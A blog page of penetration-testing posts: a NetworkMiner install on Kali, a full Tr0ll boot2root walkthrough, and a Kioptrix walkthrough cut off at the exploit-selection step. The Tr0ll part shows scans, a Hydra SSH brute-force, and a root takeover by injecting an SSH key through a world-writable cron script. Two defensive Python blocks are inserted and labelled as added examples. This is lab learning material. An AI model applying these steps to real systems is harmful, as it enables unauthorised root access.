Friday, 23 January 2015

How to Visualize Network PCAP Files in Kali Linux

So this past weekend I attended the Security Onion Conference in Augusta, GA.  While sitting in the back listening to some great speakers, @pentestfail and I were hacking away on a side project of his that involved analyzing a decent number of PCAP files.
As usual I was doing my analysis using Wireshark.  But when trying to get a bird's-eye view of a network I really like to use something like Capsa (which I've only run on Windows) to quickly see the whole picture and let me find interesting bits of traffic.  Then I'll use Wireshark to dig deeper into the things I want to look at.  But I had only brought my laptop, which is running Kali Linux.


So welcome NetworkMiner to the rescue.  NetworkMiner is also a Windows program but can be run on Linux using mono pretty easily.  Here's how I got it up and running on my Kali Linux box in about 2 minutes.
apt-get install libmono-winforms2.0-cil
wget sourceforge.net/projects/networkminer/files/latest -O /tmp/networkminer
cd /tmp
unzip ./networkminer -d /opt
cd /opt/NetworkMiner_1-6-1
chmod +x NetworkMiner.exe
chmod -R go+w AssembledFiles/
chmod -R go+w Captures/
mono /opt/NetworkMiner_1-6-1/NetworkMiner.exe
And that's it.  I love it when a plan comes together!


Defeating Tr0ll - Infosec Challenge Walkthrough

This is my walkthrough for defeating the Tr0ll infosec challenge.  This is another great "boot2root" VM that kept me guessing quite a few times.  It also made me focus more on fully utilizing some of the scripts and programs I generally use during a penetration test.  I also really liked the fact that Wireshark played a key role in solving this hacking challenge (Wireshark is pretty amazing in my book).  So I sit down at my setup and begin.
The Tr0ll VM can be downloaded from
http://vulnhub.com/entry/tr0ll-1,100/

Footprinting:
After loading up the VM I use netdiscover -r to find its IP address, which was 192.168.2.40
Scanning:
Now I start by seeing what Nmap can tell me about this system.
root@moriarty:~/Desktop# nmap -sV -P0 -A 192.168.2.40
Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-19 11:42 EDT
Nmap scan report for 192.168.2.40
Host is up (0.00060s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 10 00:43 lol.pcap [NSE: writeable]
22/tcp open  ssh     (protocol 2.0)
| ssh-hostkey:
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|_  256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/secret
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.46%I=7%D=8/19%Time=53F3705E%P=x86_64-unknown-linux-gnu%r
SF:(NULL,29,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n");
MAC Address: 08:00:27:F2:5C:A9 (Cadmus Computer Systems)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=6.46%E=4%D=8/19%OT=21%CT=1%CU=31767%PV=Y%DS=1%DC=D%G=Y%M=080027%T
OS:M=53F3706A%P=x86_64-unknown-linux-gnu)SEQ(SP=106%GCD=1%ISR=109%TI=Z%CI=I
OS:%II=I%TS=8)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11
OS:NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=71
OS:20%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=4
OS:0%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O
OS:=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40
OS:%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q
OS:=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y
OS:%DFI=N%T=40%CD=S)
Network Distance: 1 hop
Service Info: OS: Unix
TRACEROUTE
HOP RTT     ADDRESS
1   0.61 ms 192.168.2.40
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.05 seconds

Enumeration:
Since the webserver is enabled I'll continue to gather intel even though I really want to check out the FTP anonymous service that's running.  But patience really is a key to beating a lot of these challenges.
root@moriarty:~# nikto -h http://192.168.2.40
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.2.40
+ Target Hostname:    192.168.2.40
+ Target Port:        80
+ Start Time:         2014-08-19 11:44:43 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x24 0x500438fe37ded
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ File/dir '/secret/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6605 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2014-08-19 11:45:03 (GMT-4) (20 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
I also continue enumerating the webserver with dirb since it's just part of my methodology and you just never know.
root@moriarty:~# dirb http://192.168.2.40
-----------------
DIRB v2.21
By The Dark Raver
-----------------
START_TIME: Tue Aug 19 11:45:38 2014
URL_BASE: http://192.168.2.40/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4592
---- Scanning URL: http://192.168.2.40/ ----
+ http://192.168.2.40/index.html (CODE:200|SIZE:36)
+ http://192.168.2.40/robots.txt (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.2.40/secret/
+ http://192.168.2.40/server-status (CODE:403|SIZE:292)
---- Entering directory: http://192.168.2.40/secret/ ----
+ http://192.168.2.40/secret/index.html (CODE:200|SIZE:37)
-----------------
DOWNLOADED: 9184 - FOUND: 4
Now my thinking is that I'll check out the FTP service and then look into the /secret web directory if FTP doesn't lead anywhere.  But FTP has to come first because who finds anonymous FTP access anymore?  So this is at least interesting, which in my experience is a good indication that it will come into play at some point.  I also looked at SSH, but that seems pretty normal and trying to exploit this version would prove difficult, so I'll leave that as a last resort.  So the first attack vector to look into deeper is FTP.  I'll see if anonymous FTP access on this server can provide any clues or further information.  If not, then I'll dig deeper into "vsftpd 3.0.2" to see what type of exploits are available for that version.


vsftpd 3.0.2

The anonymous FTP contains only a single file called "lol.pcap", which has really piqued my interest.  I go ahead and look up "vsftpd 3.0.2" exploits but nothing really pops out immediately, so I'll put that on the back burner for now and focus on the pcap file.
root@moriarty:~# ftp 192.168.2.40
Connected to 192.168.2.40.
220 (vsFTPd 3.0.2)
Name (192.168.2.40:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxrwx    1 1000     0            8068 Aug 10 00:43 lol.pcap
226 Directory send OK.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxrwx    1 1000     0            8068 Aug 10 00:43 lol.pcap
226 Directory send OK.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        112          4096 Aug 10 00:43 .
drwxr-xr-x    2 0        112          4096 Aug 10 00:43 ..
-rwxrwxrwx    1 1000     0            8068 Aug 10 00:43 lol.pcap
226 Directory send OK.
ftp> pwd
257 "/"
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
226 Transfer complete.
8068 bytes received in 0.00 secs (16587.2 kB/s)
My next step is to load "lol.pcap" up in Wireshark and see what kind of traffic it has.  Hopefully there will be some useful information for me to use.


[screenshot: wiresharkftp1]

So I see an FTP data session that shows a file transfer.  Luckily FTP is cleartext, so I'll be able to dig deeper into this.  I can see a file that was transferred called "secret_stuff.txt".  I reconstruct the FTP transfer and what do you know?  It gives me a nice little message.

[screenshot: wiresharkftp2]

Ok I can see that @maleus21 is messing with me.  I go over the traffic several more times to make sure that I didn't miss anything but it looks like I've found all the useful information.  And of course I continue to feel mocked.
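What Wireshark's Follow TCP Stream does by hand here can be scripted, and the same parser gives the bird's-eye conversation view the NetworkMiner post above was after.  The following is an added example, not code from this write-up or from NetworkMiner: a minimal classic-pcap reader using only the standard library, a per-conversation summary, and a routine that pairs each FTP RETR on the control channel with the bytes carried on the data endpoint announced by PORT (active) or 227 (passive).  The capture it runs on is constructed in memory with made-up addresses and file contents; it is not lol.pcap.  The reader assumes Ethernet frames, IPv4, an in-order capture with no retransmissions, and does no TCP reassembly.

```python
import re
import struct
from collections import defaultdict

# ---- constructed sample capture (NOT the Tr0ll lol.pcap): anonymous FTP login,
# active-mode PORT, then RETR of one small file. Addresses are assumed. -------
CLIENT, SERVER = "192.168.2.10", "192.168.2.40"

def _ip(addr):
    return bytes(int(o) for o in addr.split("."))

def _frame(src, sport, dst, dport, payload, flags=0x18):
    """Ethernet/IPv4/TCP frame carrying payload (checksums left zero)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     _ip(src), _ip(dst)) + tcp
    return b"\x00" * 12 + b"\x08\x00" + ip

def build_pcap(frames):
    """Classic libpcap file: 24-byte global header, 16-byte record header per frame."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1000 + i, 0, len(f), len(f)) + f
    return out

SAMPLE_PCAP = build_pcap([
    _frame(SERVER, 21, CLIENT, 40001, b"220 (vsFTPd 3.0.2)\r\n"),
    _frame(CLIENT, 40001, SERVER, 21, b"USER anonymous\r\n"),
    _frame(SERVER, 21, CLIENT, 40001, b"230 Login successful.\r\n"),
    _frame(CLIENT, 40001, SERVER, 21, b"PORT 192,168,2,10,156,66\r\n"),  # 156*256+66 = 40002
    _frame(SERVER, 21, CLIENT, 40001, b"200 PORT command successful.\r\n"),
    _frame(CLIENT, 40001, SERVER, 21, b"RETR secret_stuff.txt\r\n"),
    _frame(SERVER, 21, CLIENT, 40001, b"150 Opening BINARY mode data connection.\r\n"),
    _frame(SERVER, 20, CLIENT, 40002, b"nothing to see here, "),      # data channel
    _frame(SERVER, 20, CLIENT, 40002, b"try harder\n"),
    _frame(SERVER, 21, CLIENT, 40001, b"226 Transfer complete.\r\n"),
])

def tcp_segments(pcap):
    """Yield (src, sport, dst, dport, payload) for each TCP segment in a classic pcap."""
    magic = struct.unpack("<I", pcap[:4])[0]
    if magic == 0xA1B2C3D4:
        end = "<"
    elif magic == 0xD4C3B2A1:
        end = ">"
    else:
        raise ValueError("not a classic pcap (pcapng is not handled here)")
    if struct.unpack(end + "I", pcap[20:24])[0] != 1:
        raise ValueError("only Ethernet (linktype 1) is handled here")
    off = 24
    while off + 16 <= len(pcap):
        incl = struct.unpack(end + "IIII", pcap[off:off + 16])[2]
        frame = pcap[off + 16:off + 16 + incl]
        off += 16 + incl
        if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue                                   # not IPv4 over Ethernet, or not TCP
        total = struct.unpack("!H", frame[16:18])[0]
        ip = frame[14:14 + total]
        ihl = (ip[0] & 0x0F) * 4
        src = ".".join(map(str, ip[12:16]))
        dst = ".".join(map(str, ip[16:20]))
        tcp = ip[ihl:]
        sport, dport = struct.unpack("!HH", tcp[:4])
        yield src, sport, dst, dport, tcp[(tcp[12] >> 4) * 4:]

def summarize(pcap):
    """Bird's-eye view: packet and payload-byte counts per TCP conversation."""
    convs = defaultdict(lambda: {"packets": 0, "bytes": 0})
    for src, sport, dst, dport, payload in tcp_segments(pcap):
        key = tuple(sorted([(src, sport), (dst, dport)]))
        convs[key]["packets"] += 1
        convs[key]["bytes"] += len(payload)
    return dict(convs)

_ENDPOINT = re.compile(rb"(\d+),(\d+),(\d+),(\d+),(\d+),(\d+)")

def ftp_transfers(pcap):
    """Pair each RETR on the control channel (port 21) with the bytes seen on the
    data endpoint announced just before it by PORT (active) or 227 (passive)."""
    segs = list(tcp_segments(pcap))
    files, data_ep = {}, None
    for src, sport, dst, dport, payload in segs:
        if 21 not in (sport, dport):
            continue
        for line in payload.splitlines():
            m = _ENDPOINT.search(line)
            if m and (line.startswith(b"PORT") or line.startswith(b"227")):
                h = m.groups()
                data_ep = (b".".join(h[:4]).decode(), int(h[4]) * 256 + int(h[5]))
            elif line.startswith(b"RETR") and data_ep:
                name = line[4:].strip().decode()
                files[name] = b"".join(p for s, sp, d, dp, p in segs
                                       if data_ep in ((s, sp), (d, dp)))
    return files

if __name__ == "__main__":
    for (a, b), c in summarize(SAMPLE_PCAP).items():
        print("%s:%d <-> %s:%d  %d pkts  %d bytes" % (a + b + (c["packets"], c["bytes"])))
    for name, data in ftp_transfers(SAMPLE_PCAP).items():
        print(name, data)
```

Running the file prints the conversation table and the reconstructed file.  For a real capture, pass the bytes of the .pcap file to summarize() or ftp_transfers(); a pcapng file needs a different reader.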

[screenshot: MessWithTheBestDieLikeTheRest]

My only clue here is that "sup3rs3cr3tdirlol" is mentioning a directory.  Since FTP doesn't have anything more for me and I have no SSH information to go on, my only hope is the webserver.  So I whisper "Help me Apache 2.4.7... you're my only hope."  First I try out the /secret that I discovered earlier.  But this is another dead end belittling my skills.  I check the source of the page just to make sure, but it's definitely a dead end.
With limited services running on this box I'm hoping that "sup3rs3cr3tdirlol" or "sup3rs3cr3t" is a web directory since I'm not really seeing any other options at the moment.  So I try /sup3rs3cr3tdirlol as this is really my only move at this point.  Fingers crossed and BOOM!, I've got something.  This is when the little tingling feeling starts filling up my stomach.

[screenshot: sup3rs3cr3tdirlol]

Awesome, that worked and now I've got a file called "roflmao".  Let me check this out.
root@moriarty:~/Desktop# file roflmao
roflmao: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x0e42145e99e559aa4908f5c259d983044fcfd2f3, not stripped
Ok so it's a 32-bit ELF file.  Let me see what else I can find out about it.
root@moriarty:~/Desktop/Troll# readelf -h roflmao
ELF Header:
Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
Class:                             ELF32
Data:                              2's complement, little endian
Version:                           1 (current)
OS/ABI:                            UNIX - System V
ABI Version:                       0
Type:                              EXEC (Executable file)
Machine:                           Intel 80386
Version:                           0x1
Entry point address:               0x8048320
Start of program headers:          52 (bytes into file)
Start of section headers:          4428 (bytes into file)
Flags:                             0x0
Size of this header:               52 (bytes)
Size of program headers:           32 (bytes)
Number of program headers:         9
Size of section headers:           40 (bytes)
Number of section headers:         30
Section header string table index: 27
Everything looks pretty normal in the file and I don't see anything slapping me in the face so it's time to run "roflmao" and find out what it does.


[screenshot: roflmao]

root@moriarty:~/Desktop/Troll# ./roflmao
Find address 0x0856BF to proceedroot@moriarty:~/Desktop/Troll#
My immediate thought is that 0x0856BF is a memory address which starts making me sweat.  Like all the great hackers before me whenever I get stuck, I stop and ask myself.  What would Zero Cool do?  Lol, actually I would never think that but it does make for a better story doesn't it?

[image: Zero Cool]

My actual thought is this.  What's the simplest solution?  What do I know so far about this system?  What do I know about how Maleus thinks so far?  And my subconscious whispers "directory" which makes sense since it's clear that Maleus likes using obscure directories as we've already seen.
Hacker Pro Tip:   Don't over complicate things.  Remember KISS?  This type of thinking has saved me more times than I can remember.  Plus I'm always looking for shortest distance to an objective since I'm lazy.  So why not try "0x0856BF" as a web directory since it will literally take 4 seconds.
So I go for the long shot and try /0x0856BF.  Awesome, it is and more stuff is revealed.  Two directories.

[screenshot: 0856bf]

The first is /good_luck and the second is /this_folder_contains_the_password.  I check out the first folder and find this text file.
/0x0856BF/good_luck/which_one_lol.txt
Which contains the following.
maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow
So these look like user names so now I check out the second one.  The second folder contains this file.
/0x0856BF/this_folder_contains_the_password/Pass.txt
Which has a nice little message.
Good_job_:)
Since FTP seems to be set up for anonymous access only, I'm going to focus on SSH for the time being.  I'm going to use Hydra to automate logging in with these accounts and "Good_job_:)" as the password.
So after several attempts I begin to get banned.

[screenshot: Hydra1]

I'm not sure about the timeout since I control the VM.  I keep on rebooting the VM and trying again but it's the same story again and again.  The only good thing was that after numerous failed attempts I started looking into Hydra parameters more than I have before and learned quite a bit more about better ways to use it which I know will serve me better in the future.
After trying all the accounts with "Good_job_:)" and getting no luck I stop and take a break to clear my head.  I'm clearly missing something.  After some time away I come back and go through everything again to see what I've missed.  Knowing myself it's probably some small detail that I've overlooked.  I start looking at things a little more closely to see if I could come up with a few more passwords to try.  That's where re-reading the folder name gave me the idea for two more password choices, so my password list became this.
Pass
Pass.txt
After trial and error and numerous more reboots I finally get a match for "overflow" and "Pass.txt".  Sweet!


[screenshot: HydraSuccess]

Gaining Access:
Shell - Here I come.


[screenshot: shell]

As soon as I start looking around I get this message and I'm booted.
Broadcast Message from root@trol
(somewhere) at 10:00 ...
TIMES UP LOL!
Connection to 192.168.2.40 closed by remote host.
Connection to 192.168.2.40 closed.
Ok so it looks like my session is being timed out.  I log back in and do a quick run through for any files that catch my eye.
$ cd /var/tmp
$ ls -al
total 12
drwxrwxrwt  2 root root 4096 Sep  2 12:17 .
drwxr-xr-x 12 root root 4096 Aug 10 03:56 ..
-rwxrwxrwx  1 root root   34 Aug 13 01:16 cleaner.py.swp
Looking at the swp file I see it refers to cleaner.py as you'd think but doesn't provide any other information.
Even though overflow is a low-level user I do a "find / -name cleaner.py" anyway to save some time (appending 2>/dev/null keeps the permission-denied noise out of the output).

[screenshot: lib-log]

Ok so the very last line shows us that cleaner.py is located in /lib/log/ and a "ls -al" shows it's owned by root.  This could be good.


[screenshot: cleaner]

I use VI to see what's going on.
#!/usr/bin/env python
import os
import sys
try:
    os.system('rm -r /tmp/* ')
except:
    sys.exit()
Knowing that root owns this file and seeing os.system I know what my next move is going to be.  I'm going to have os.system echo my ssh key into the authorized_keys for root.  I've never actually done this all in a single line but it should work (at least in theory).
So here's what cleaner.py ends up looking like. (I've shorten my key to save space but you get the point.)
#!/usr/bin/env python
import os
import sys
try:
    # absolute paths, and 0700/0600 so sshd's StrictModes accepts the key
    os.system('mkdir -p /root/.ssh; chmod 700 /root/.ssh; echo "ssh-dss AAAAB3NzaC1kc3MAAACBAI0mFQzmVthxmCywdKX/ZYDnN/9CzgpRsVTYRgffWU+43xuNRoy+HUGUBxGTuQBaaPMLYEMZgQFkvc+xG0sTfjf73CqR0lKO8+rUyUTCJTzWpjWh9zf2/tHEiXjGAveBwiay1vLsGFEO47QXmyu+lRgFjg== root@moriarty" >> /root/.ssh/authorized_keys; chmod 600 /root/.ssh/authorized_keys')
except:
    sys.exit()
Now I save the file and wait for it to be kicked off.  What's interesting is that when trying to save my changes in vi it comes up with a permissions error since I'm logged in as "overflow".  But when using "cat" I can see that my changes have been saved.  Sweet luck for me!  (The likely cause: vi cannot create its backup or swap file in /lib/log, which overflow cannot write to, while the write to the writable cleaner.py itself goes through.)  After being disconnected it's time to try to login as root.
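The root cause on this box is a privileged scheduled job executing a file that a low-privilege user can write.  The following is an added example, not code from the write-up: it parses system-crontab lines (assumed format: schedule, user, command), checks each absolute path the commands reference for world- or group-writable modes, unexpected ownership and a writable parent directory, and demonstrates the check on a constructed temporary directory holding a world-writable cleaner.py next to a correctly locked-down script.  The crontab text and paths are made up; the Tr0ll box's actual scheduler entry is not shown in the post.

```python
import os
import re
import shutil
import stat
import tempfile

# System-crontab format (/etc/crontab, /etc/cron.d/*): schedule, user, command.
CRON_LINE = re.compile(
    r"^\s*(?:@\w+\s+|(?:[\d*/,-]+\s+){5})(?P<user>\S+)\s+(?P<cmd>.+?)\s*$")

def unsafe_modes(path, owner=0):
    """Reasons a script run by a privileged job could be altered by someone other
    than `owner` (uid 0 by default): the Tr0ll mistake, a root job running a
    file any user can write."""
    reasons = []
    st = os.stat(path)
    if st.st_uid != owner:
        reasons.append("owned by uid %d, not the job's user" % st.st_uid)
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable file")
    elif st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable file (gid %d)" % st.st_gid)
    parent = os.stat(os.path.dirname(path) or ".")
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        reasons.append("parent directory world-writable without sticky bit")
    return reasons

def audit_crontab(text, owner=0):
    """Map every existing absolute path named in a crontab to the problems found."""
    findings = {}
    for line in text.splitlines():
        m = CRON_LINE.match(line)
        if not m or line.lstrip().startswith("#"):
            continue
        for tok in m.group("cmd").split():
            if tok.startswith("/") and os.path.isfile(tok):
                reasons = unsafe_modes(tok, owner)
                if reasons:
                    findings[tok] = reasons
    return findings

def demo():
    """Constructed example: a world-writable cleaner.py next to a locked-down script."""
    root = tempfile.mkdtemp()
    bad, good = os.path.join(root, "cleaner.py"), os.path.join(root, "backup.sh")
    for p in (bad, good):
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\nexit 0\n")
    os.chmod(bad, 0o777)      # world-writable, as cleaner.py had to be for overflow to edit it
    os.chmod(good, 0o755)
    crontab = ("# m h dom mon dow user command\n"
               "*/2 * * * * root python %s\n"
               "@daily root %s\n" % (bad, good))
    try:
        # the temp files belong to us, not root, so audit against our own uid
        return audit_crontab(crontab, owner=os.getuid())
    finally:
        shutil.rmtree(root)

if __name__ == "__main__":
    for path, reasons in demo().items():
        print(path, "->", "; ".join(reasons))
```

On a real host, feed audit_crontab() the contents of /etc/crontab and each file in /etc/cron.d with the default owner of 0; the same check applies to anything else root runs on a schedule.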

[screenshot: root ssh]

And success!!  I'm logged into Tr0ll as root.  Then I looked to see if there is any type of flag.
root@troll:/lib/log#
root@troll:/lib/log# cd /root/
root@troll:~# ls
proof.txt
root@troll:~# cat proof.txt
Good job, you did it!
702a8c18d29c6f3ca0d99ef5712bfbdc
And there you have it.  This is a great boot2root and I really enjoyed it.

Xerxes 2: The Second One -- Hacking Challenge Walkthrough

Coming Soon....

Kioptrix Level 1 Hacking Challenge Walkthrough

This is a walkthrough for Kioptrix Level 1.  Although getting root on this box is pretty straightforward, it's a great place for those looking to get their feet wet when it comes to boot2root VMs.  I actually suggest this as a starting place rather than something like Metasploitable2, which is almost overwhelming with its list of vulnerabilities.
The Kioptrix Level 1 VM can be downloaded from http://vulnhub.com/entry/kioptrix-level-1-1,22/

Footprinting:
After loading up the VM I used netdiscover -r to find its IP address, which was 192.168.2.90
Scanning:
Now it’s time to use Nmap to grab info about what ports and services are available.

root@moriarty:~# nmap -sV -P0 -A 192.168.2.90
Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-13 11:42 EDT
Nmap scan report for 192.168.2.90
Host is up (0.00069s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|_sshv1: Server supports SSHv1
80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1          32768/tcp  status
|_  100024  1          32768/udp  status
139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=–
| Not valid before: 2009-09-26T08:32:06+00:00
|_Not valid after:  2010-09-26T08:32:06+00:00
|_ssl-date: 2014-08-13T19:43:04+00:00; +3h59m58s from local time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
32768/tcp open  status      1 (RPC #100024)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1          32768/tcp  status
|_  100024  1          32768/udp  status
MAC Address: 08:00:27:C4:86:B7 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 – 2.4.18 (likely embedded)
Network Distance: 1 hop
Host script results:
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: , NetBIOS MAC: (unknown)
TRACEROUTE
HOP RTT     ADDRESS
1   0.69 ms 192.168.2.90
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.77 seconds
The first thing I noticed is that most of these services are pretty outdated, which is good news.  The second thing that grabs my attention is the version of Apache being run.  There are clearly several services running that may provide a foothold into the box, but I decided to stick with Apache since it caught my eye.  I fire up Iceweasel and find a default-looking Apache page running on the webserver.  Now to run Nikto to see what kind of information it can gather about the webserver.

Enumeration:
root@moriarty:~# nikto -h 192.168.2.90
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.2.90
+ Target Hostname:    192.168.2.90
+ Target Port:        80
+ Start Time:         2014-08-13 11:44:28 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep  5 23:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.0.1e). OpenSSL 0.9.8r is also current.
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ OSVDB-637: Enumeration of users is possible by requesting ~username (responds with ‘Forbidden’ for users, ‘not found’ for non-existent users).
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 – Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 – Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 – Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 – mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra ‘/’ to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting…
+ 7355 requests: 0 error(s) and 20 item(s) reported on remote host
+ End Time:           2014-08-13 11:44:53 (GMT-4) (25 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Gaining Access:
Ok so the first thing that Nikto returns is
+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
I do a simple Google search to see if there are any obvious exploits that fit my needs.


Well the first result seems to fit the bill quite well.  Now I’m going to use searchsploit to see if I’ve already got this exploit.
root@moriarty:~# searchsploit apache openssl
Description                                                    Path
-------------------------------------------------------------- ----------------------------------
Apache OpenSSL – Remote Exploit (Multiple Targets) (OpenFuck | /linux/remote/764.c
Alright, now it’s time to copy this into my /tmp/exploit directory and see what we’ve got.
Ok so the very first section gives us what we need.
/*
